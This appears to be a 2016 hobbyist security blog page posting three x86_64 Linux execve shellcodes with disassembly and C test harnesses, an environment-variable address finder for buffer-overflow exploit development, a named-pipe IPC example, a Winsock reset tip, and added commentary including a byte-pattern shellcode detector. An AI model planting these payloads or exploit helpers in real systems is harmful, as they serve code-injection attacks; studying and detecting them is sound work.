
Monday 28 March 2016

Ajith KP

Linux/x86_x64 - execve(/bin/bash) - 33 bytes

Hi GuyZ,
     You can find it at: https://www.exploit-db.com/exploits/39625/


Source Code

/*
---------------------------------------------------------------------------------------------------

Linux/x86_x64 - execve(/bin/bash) - 33 bytes

Ajith Kp [ @ajithkp560 ] [ http://www.terminalcoders.blogspot.com ]

Om Asato Maa Sad-Gamaya |
Tamaso Maa Jyotir-Gamaya |
Mrtyor-Maa Amrtam Gamaya |
Om Shaantih Shaantih Shaantih |

---------------------------------------------------------------------------------------------------
Disassembly of section .text:

0000000000400080 <.text>:
  400080: eb 0b                 jmp    0x40008d
  400082: 5f                    pop    rdi
  400083: 48 31 d2              xor    rdx,rdx
  400086: 52                    push   rdx
  400087: 5e                    pop    rsi
  400088: 6a 3b                 push   0x3b
  40008a: 58                    pop    rax
  40008b: 0f 05                 syscall
  40008d: e8 f0 ff ff ff        call   0x400082
  400092: 2f                    (bad)
  400093: 2f                    (bad)
  400094: 2f                    (bad)
  400095: 2f                    (bad)
  400096: 62                    (bad)
  400097: 69 6e 2f 2f 2f 2f 2f  imul   ebp,DWORD PTR [rsi+0x2f],0x2f2f2f2f
  40009e: 62                    .byte 0x62
  40009f: 61                    (bad)
  4000a0: 73 68                 jae    0x40010a
---------------------------------------------------------------------------------------------------

How To Run

$ gcc -o bash_shell bash_shell.c
$ execstack -s bash_shell
$ ./bash_shell

---------------------------------------------------------------------------------------------------
*/
#include <stdio.h>
char sh[]="\xeb\x0b\x5f\x48\x31\xd2\x52\x5e\x6a\x3b\x58\x0f\x05\xe8\xf0\xff\xff\xff\x2f\x2f\x2f\x2f\x62\x69\x6e\x2f\x2f\x2f\x2f\x62\x61\x73\x68";
int main(void)
{
 /* sh lives in a writable data segment, so this only runs where that segment is also
    executable (the execstack -s step above); 64-bit kernels since Linux 5.8 no longer
    grant that through the exec-stack flag, and the call then faults under NX. */
 void (*func)(void);
 func = (void (*)(void)) sh; /* treat the byte array as code */
 func(); /* does not return on success: execve replaces the process image */
 return 0;
}

Saturday 26 March 2016

Ajith KP

Linux/x86_x64 - execve(/bin/sh) - 25 bytes

Hi GuyZ,
     You can find it at: http://0day.today/exploit/25119

Source Code


/*
---------------------------------------------------------------------------------------------------

Linux/x86_x64 - execve(/bin/sh) - 25 bytes

Ajith Kp [ @ajithkp560 ] [ http://www.terminalcoders.blogspot.com ]

Om Asato Maa Sad-Gamaya |
Tamaso Maa Jyotir-Gamaya |
Mrtyor-Maa Amrtam Gamaya |
Om Shaantih Shaantih Shaantih |

---------------------------------------------------------------------------------------------------
Disassembly of section .text:

0000000000400080 <.text>:
  400080: eb 0b                 jmp    0x40008d
  400082: 5f                    pop    rdi
  400083: 48 31 d2              xor    rdx,rdx
  400086: 52                    push   rdx
  400087: 5e                    pop    rsi
  400088: 6a 3b                 push   0x3b
  40008a: 58                    pop    rax
  40008b: 0f 05                 syscall
  40008d: e8 f0 ff ff ff        call   0x400082
  400092: 2f                    (bad)
  400093: 62                    (bad)
  400094: 69                    .byte 0x69
  400095: 6e                    outs   dx,BYTE PTR ds:[rsi]
  400096: 2f                    (bad)
  400097: 73 68                 jae    0x400101
---------------------------------------------------------------------------------------------------

How To Run

$ gcc -o sh_shell sh_shell.c
$ execstack -s sh_shell
$ ./sh_shell

---------------------------------------------------------------------------------------------------
*/
#include <stdio.h>
char sh[]="\xeb\x0b\x5f\x48\x31\xd2\x52\x5e\x6a\x3b\x58\x0f\x05\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
int main(void)
{
 void (*func)(void);
 func = (void (*)(void)) sh; /* treat the byte array as code */
 func(); /* does not return on success: execve replaces the process image */
 return 0;
}

Thursday 24 March 2016

Ajith KP

Buffer Overflow exploitation in Kali Linux x64 Video Tutorial

Hello GuyZ,
     After a long break, I have created another tutorial on Buffer Overflow exploitation. The previous exploitation tutorials are,
Part 1: http://terminalcoders.blogspot.com/2015/08/simple-buffer-overflow-attack-with.html
Part 2: http://terminalcoders.blogspot.com/2015/09/simple-buffer-overflow-attack-with.html

Image from: wonderhowto.com
The above tutorials exploit a Windows buffer overflow vulnerability in the sample application `Cool Player`, using Immunity Debugger and Python.

But here the target is the Linux x86_64 (64-bit) version. There is no difference in the exploitation steps, but the registers differ between x86 and x64, and so do the register widths. The tutorial uses the PEDA debugger, which is an extension of GDB (the GNU Debugger). You can learn how to use PEDA from this tutorial.

Video

Ajith KP

Linux/x86_x64 - execve(/bin/sh) - 26 bytes

Hi GuyZ,
     After a long break, I have coded a shellcode. Unlike previous times, this time it is for x64 Linux.
You can find it at: http://0day.today/exploit/25114 and https://www.exploit-db.com/exploits/39617/


Source Code

/*
---------------------------------------------------------------------------------------------------
 
Linux/x86_x64 - execve(/bin/sh) - 26 bytes
 
Ajith Kp [ @ajithkp560 ] [ http://www.terminalcoders.blogspot.com ]
 
Om Asato Maa Sad-Gamaya |
Tamaso Maa Jyotir-Gamaya |
Mrtyor-Maa Amrtam Gamaya |
Om Shaantih Shaantih Shaantih |
 
---------------------------------------------------------------------------------------------------
Disassembly of section .text:
 
0000000000400080 <.text>:
  400080:   eb 0b                   jmp    0x40008d
  400082:   5f                      pop    %rdi
  400083:   48 31 d2                xor    %rdx,%rdx
  400086:   48 89 d6                mov    %rdx,%rsi
  400089:   b0 3b                   mov    $0x3b,%al
  40008b:   0f 05                   syscall
  40008d:   e8 f0 ff ff ff          callq  0x400082
  400092:   2f                      (bad)
  400093:   2f                      (bad)
  400094:   62                      (bad)
  400095:   69                      .byte 0x69
  400096:   6e                      outsb  %ds:(%rsi),(%dx)
  400097:   2f                      (bad)
  400098:   73 68                   jae    0x400102
---------------------------------------------------------------------------------------------------
 
How To Run
 
$ gcc -o sh_shell sh_shell.c
$ execstack -s sh_shell
$ ./sh_shell
 
---------------------------------------------------------------------------------------------------
*/
#include <stdio.h>
char sh[]="\xeb\x0b\x5f\x48\x31\xd2\x48\x89\xd6\xb0\x3b\x0f\x05\xe8\xf0\xff\xff\xff\x2f\x2f\x62\x69\x6e\x2f\x73\x68";
int main(void)
{
    void (*func)(void);
    func = (void (*)(void)) sh; /* treat the byte array as code */
    func(); /* does not return on success: execve replaces the process image */
    return 0;
}
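As an added example (not code from the posts or from exploit-db), the following scanner, in the spirit of a byte-pattern YARA rule, checks a buffer for the two things the three shellcodes above have in common: rax loaded with 59 (execve on x86_64) directly before a `syscall` instruction, and a `/bin/...sh` path padded with extra slashes. The function names are this example's own; the sample inputs are the page's three shellcodes, byte for byte, plus two constructed benign buffers that each carry only one of the two indicators, which is what keeps the verdict from firing on ordinary text that merely mentions `/bin/sh`.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Byte sequences that load rax with 59 (SYS_execve on x86_64). In all three
   shellcodes above one of these sits immediately before `syscall` (0f 05). */
static const struct { const char *bytes; size_t n; } rax59_setups[] = {
    { "\x6a\x3b\x58", 3 },          /* push 0x3b ; pop rax */
    { "\xb0\x3b", 2 },              /* mov al, 0x3b        */
    { "\xb8\x3b\x00\x00\x00", 5 },  /* mov eax, 0x3b       */
};

/* Offset of a `syscall` directly preceded by one of the rax=59 setups, or -1. */
long find_execve_syscall(const unsigned char *buf, size_t len) {
    for (size_t i = 0; i + 1 < len; i++) {
        if (buf[i] != 0x0f || buf[i + 1] != 0x05)
            continue;
        for (size_t k = 0; k < sizeof rax59_setups / sizeof rax59_setups[0]; k++) {
            size_t n = rax59_setups[k].n;
            if (i >= n && memcmp(buf + i - n, rax59_setups[k].bytes, n) == 0)
                return (long)i;
        }
    }
    return -1;
}

/* 1 if buf holds a shell path such as /bin/sh, //bin/sh or ////bin////bash.
   Runs of slashes are collapsed because the shellcodes pad the path with them
   to reach a convenient length without introducing NUL bytes. */
int has_bin_shell_path(const unsigned char *buf, size_t len) {
    for (size_t i = 0; i < len; i++) {
        size_t p = i;
        if (buf[p] != '/') continue;
        while (p < len && buf[p] == '/') p++;
        if (p + 3 > len || memcmp(buf + p, "bin", 3) != 0) continue;
        p += 3;
        if (p >= len || buf[p] != '/') continue;
        while (p < len && buf[p] == '/') p++;
        if (p + 2 <= len && memcmp(buf + p, "sh", 2) == 0) return 1;
        if (p + 4 <= len && memcmp(buf + p, "bash", 4) == 0) return 1;
    }
    return 0;
}

/* Both indicators together: an execve syscall and a shell path in one blob. */
int looks_like_execve_shell(const unsigned char *buf, size_t len) {
    return find_execve_syscall(buf, len) >= 0 && has_bin_shell_path(buf, len);
}

/* Constructed samples: the three shellcodes from the posts above, and two
   benign buffers that carry only one of the two indicators each. */
const unsigned char sc_bash33[] = "\xeb\x0b\x5f\x48\x31\xd2\x52\x5e\x6a\x3b\x58\x0f\x05\xe8\xf0\xff\xff\xff\x2f\x2f\x2f\x2f\x62\x69\x6e\x2f\x2f\x2f\x2f\x62\x61\x73\x68";
const unsigned char sc_sh25[]   = "\xeb\x0b\x5f\x48\x31\xd2\x52\x5e\x6a\x3b\x58\x0f\x05\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
const unsigned char sc_sh26[]   = "\xeb\x0b\x5f\x48\x31\xd2\x48\x89\xd6\xb0\x3b\x0f\x05\xe8\xf0\xff\xff\xff\x2f\x2f\x62\x69\x6e\x2f\x73\x68";
const unsigned char benign_text[] = "GET /bin/sh HTTP/1.1";          /* path, no syscall   */
const unsigned char benign_exit[] = "\xb8\x3c\x00\x00\x00\x0f\x05";  /* exit(), no path    */

int main(void) {
    const struct { const char *name; const unsigned char *b; size_t n; } samples[] = {
        { "bash 33",     sc_bash33,   sizeof sc_bash33 - 1 },
        { "sh 25",       sc_sh25,     sizeof sc_sh25 - 1 },
        { "sh 26",       sc_sh26,     sizeof sc_sh26 - 1 },
        { "benign text", benign_text, sizeof benign_text - 1 },
        { "benign exit", benign_exit, sizeof benign_exit - 1 },
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-12s syscall@%ld path=%d verdict=%d\n", samples[i].name,
               find_execve_syscall(samples[i].b, samples[i].n),
               has_bin_shell_path(samples[i].b, samples[i].n),
               looks_like_execve_shell(samples[i].b, samples[i].n));
    return 0;
}
```

The `syscall` lands at offset 11 in all three samples: the jmp/call/pop prologue and the register setup occupy the same eleven bytes whichever way rax is loaded, which is why the third setup form (`mov eax, 0x3b`) is included even though none of these samples use it.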
Ajith KP

Environment Variable Addresse Finder for Linux

Hi GuyZ,
     This is a useful tool that you will need in buffer overflow exploitation and exploit development. I got this tool from here.

Source Code

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
 char *ptr;

 if(argc < 3) {
  printf("Usage: %s <environment variable> <target program name>\n", argv[0]);
  return 1;
 }
 ptr = getenv(argv[1]); /* get env var location */
 if(ptr == NULL) {
  printf("%s is not set in this environment\n", argv[1]);
  return 1;
 }
 /* adjust for program name: the program name is stored twice on the stack above the
    environment, so a difference in name length shifts it by twice that many bytes */
 ptr += (strlen(argv[0]) - strlen(argv[2]))*2;
 printf("%s will be at %p\n", argv[1], ptr);
 return 0;
}

Ajith KP

Named Pipes (FIFO): In Linux for Interprocess Communication

Hello GuyZ,
    Named pipes, or FIFOs, are a communication medium between processes of different ancestry. A named pipe exists as a special file in the file system. When the sharing processes have finished all their I/O, the named pipe remains in the file system for later use. Here, the processes are,
  • Client - sends data to the server
  • Server - retrieves the data from the client, processes it, and sends back the result
Here the server process retrieves the string sent by the client, converts it to capital letters and sends it back to the client.

Code of Client

#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
/*
 [*] Ajith Kp [@ajithkp560]
 [*] http://www.terminalcoders.blogspot.com
*/
int main(void) {
    int rd, wr;
    ssize_t n;
    char buff[1024];
    printf("Enter data to send: ");
    if(fgets(buff, sizeof buff, stdin) == NULL) { /* bounded read; gets() could overflow buff */
        return 1;
    }
    buff[strcspn(buff, "\n")] = '\0';             /* drop the trailing newline */
    wr = open("input", O_WRONLY);                 /* open order mirrors the server's */
    rd = open("output", O_RDONLY);
    if(wr < 0 || rd < 0) {
        perror("open");
        return 1;
    }
    write(wr, buff, strlen(buff));
    n = read(rd, buff, sizeof buff - 1);
    if(n < 0) {
        perror("read");
        return 1;
    }
    buff[n] = '\0';                               /* terminate whatever the server sent */
    printf("Uppercase Data: %s\n", buff);
    close(rd);
    close(wr);
    return 0;
}

Code of Server

#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
#include <string.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <ctype.h>
/*
 [*] Ajith Kp [@ajithkp560]
 [*] http://www.terminalcoders.blogspot.com
*/
int main(void) {
    int rd, wr;
    ssize_t n;
    char buff[1024];
    /* 0666 (minus umask) lets any local user open these pipes; tighten it if that is not wanted */
    mkfifo("input", 0666);
    mkfifo("output", 0666);
    rd = open("input", O_RDONLY);    /* blocks until the client opens "input" for writing */
    wr = open("output", O_WRONLY);   /* blocks until the client opens "output" for reading */
    if(rd < 0 || wr < 0) {
        perror("open");
        return 1;
    }
    n = read(rd, buff, sizeof buff - 1);
    if(n < 0) {
        perror("read");
        return 1;
    }
    buff[n] = '\0';                  /* read() does not terminate the data; strlen() needs this */
    for(ssize_t i = 0; i < n; i++) {
        buff[i] = toupper((unsigned char)buff[i]);
    }
    write(wr, buff, (size_t)n + 1);  /* send the terminator too */
    close(rd);
    close(wr);
    return 0;
}

Pic 1: Named pipe server waits for data and the named pipe client asks for user input
Pic 2: Named pipe server receives the data the user entered in the client and returns the result to the client
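The exchange the post describes (client sends a string, server upper-cases it and replies), carried through end to end as an added example that is not the post's own code: the parent acts as the client and a forked child as the server, so both sides' messages run in one program and the result can be checked. The names fifo_roundtrip, run_server and roundtrip_matches are this example's own, and it deliberately tightens one thing the post leaves open: the FIFOs are created with mode 0600 inside a private temporary directory rather than 0666 in the working directory, so no other local user can write requests into the pipe or read the replies.

```c
#define _POSIX_C_SOURCE 200809L
#include <ctype.h>
#include <fcntl.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <unistd.h>

#define MSG_MAX 1024

/* Server half: read one request from `in`, upper-case it, send it back on `out`
   together with its terminating NUL. Returns 0 on success, 1 on any failure. */
static int run_server(const char *in, const char *out) {
    char buff[MSG_MAX];
    /* Open order must mirror the client's (input, then output); otherwise each
       side blocks in open() waiting for the other end of the wrong FIFO. */
    int rd = open(in, O_RDONLY);
    int wr = open(out, O_WRONLY);
    if (rd < 0 || wr < 0) return 1;
    ssize_t n = read(rd, buff, sizeof buff - 1);
    if (n < 0) return 1;
    buff[n] = '\0';                          /* read() never NUL-terminates for you */
    for (ssize_t i = 0; i < n; i++)
        buff[i] = (char)toupper((unsigned char)buff[i]);
    int ok = write(wr, buff, (size_t)n + 1) == n + 1;
    close(rd);
    close(wr);
    return ok ? 0 : 1;
}

/* Client half plus setup: creates two private FIFOs, forks the server, sends
   `msg` and stores the reply in `reply`. Returns 0 on success, 1 otherwise;
   on failure the contents of `reply` must not be trusted. */
int fifo_roundtrip(const char *msg, char *reply, size_t replysz) {
    char dir[] = "/tmp/fifo_demo_XXXXXX";   /* mkdtemp template; directory is 0700 */
    char in[64], out[64];
    int rc = 1, wr = -1, rd = -1, status;
    pid_t pid;
    size_t len = strlen(msg);

    if (len >= MSG_MAX || replysz < 2) return 1;
    if (mkdtemp(dir) == NULL) return 1;
    snprintf(in, sizeof in, "%s/input", dir);
    snprintf(out, sizeof out, "%s/output", dir);
    /* 0600 instead of the post's 0666: only this user can reach either pipe. */
    if (mkfifo(in, 0600) < 0 || mkfifo(out, 0600) < 0) goto cleanup;

    pid = fork();
    if (pid < 0) goto cleanup;
    if (pid == 0) _exit(run_server(in, out));

    wr = open(in, O_WRONLY);
    rd = open(out, O_RDONLY);
    if (wr < 0 || rd < 0) {
        kill(pid, SIGTERM);                  /* do not leave the server stuck in open() */
    } else if (write(wr, msg, len) == (ssize_t)len) {
        close(wr);                           /* EOF tells the server the request is complete */
        wr = -1;
        ssize_t n = read(rd, reply, replysz - 1);
        if (n >= 0) { reply[n] = '\0'; rc = 0; }
    }
    if (wr >= 0) close(wr);
    if (rd >= 0) close(rd);
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status) || WEXITSTATUS(status) != 0)
        rc = 1;
cleanup:
    unlink(in);
    unlink(out);
    rmdir(dir);
    return rc;
}

/* Convenience check: 1 if the round trip succeeds and the reply equals `expected`. */
int roundtrip_matches(const char *msg, const char *expected) {
    char reply[MSG_MAX];
    if (fifo_roundtrip(msg, reply, sizeof reply) != 0) return 0;
    return strcmp(reply, expected) == 0;
}

int main(void) {
    char reply[MSG_MAX];
    if (fifo_roundtrip("hello fifo", reply, sizeof reply) != 0) {
        fprintf(stderr, "round trip failed\n");
        return 1;
    }
    printf("Uppercase Data: %s\n", reply);
    return 0;
}
```

Closing the client's write end right after the request is what lets an empty request work: the server's read() returns 0 at EOF instead of blocking, and it still answers with a single NUL byte. With the post's original client, where the write end stays open until the reply arrives, that case deadlocks.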

Monday 14 March 2016

Ajith KP

Google Chrome freezes Desktop: An easy solution

Hi GuyZ,
     A few days ago, I installed RealTek sound drivers along with some other drivers on my DELL Inspiron laptop. After that, whenever I opened Google Chrome my desktop froze and only Google Chrome ran. I wasn't able to do anything other than browse using Chrome, or open Task Manager and close the Chrome browser.

After closing Google Chrome, the desktop behaves normally. I Googleized the problem and found too many solutions, including deleting the Google Chrome user files, disabling plugins (including the Flash Player plugin), etc. But none of these worked. So, at last, I found a solution: reset Windows's `WINSOCK`.
To reset winsock, you have to open a Command Prompt as Administrator. The steps are,

  1. Open a Command Prompt as Administrator.
  2. Enter the command `netsh winsock reset`
  3. Execute the command
Hope your problem will be solved. Have a nice day.